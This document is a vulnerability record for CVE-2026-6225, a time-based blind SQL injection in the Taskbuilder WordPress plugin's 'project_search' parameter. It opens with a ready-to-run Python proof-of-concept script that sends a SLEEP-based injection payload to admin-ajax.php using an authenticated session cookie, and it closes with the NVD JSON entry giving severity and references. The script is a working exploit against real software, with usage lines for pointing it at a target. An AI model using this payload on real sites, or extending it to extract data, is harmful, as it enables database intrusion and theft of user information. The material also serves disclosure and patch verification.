CVE-2026-6225

# PoC for CVE-2026-6225 (Time-based Blind SQL Injection) import requests import time def check_sqli(url, cookies): # The vulnerable parameter is 'project_search' # Endpoint might be admin-ajax.php or specific plugin page target_endpoint = url + "/wp-admin/admin-ajax.php" # Payload for time-based blind SQL injection # Adjust the sleep time if network latency is high payload = "1' AND (SELECT SLEEP(5))#" data = { "action": "taskbuilder_project_search", # Action name might vary, check plugin source "project_search": payload } try: start_time = time.time() response = requests.post(target_endpoint, data=data, cookies=cookies, timeout=10) end_time = time.time() # If response takes longer than sleep time, it indicates vulnerability if end_time - start_time >= 5: print("[+] Vulnerability confirmed: Time delay detected.") else: print("[-] Vulnerability not detected or patch applied.") except Exception as e: print(f"Error: {e}") # Usage: Replace with valid target URL and authenticated cookies target_url = "http://example.com" auth_cookies = {"wordpress_logged_in_...": "session_cookie_here"} check_sqli(target_url, auth_cookies)

{"cve": {"id": "CVE-2026-6225", "sourceIdentifier": "[email protected]", "published": "2026-05-14T07:16:20.373", "lastModified": "2026-05-14T14:28:41.283", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Taskbuilder – Project Management & Task Management Tool With Kanban Board plugin for WordPress is vulnerable to time-based blind SQL Injection via the 'project_search' parameter in all versions up to, and including, 5.0.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3507782/taskbuilder", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/561479ed-2402-4511-9344-d6b9e28f2f33?source=cve", "source": "[email protected]"}]}}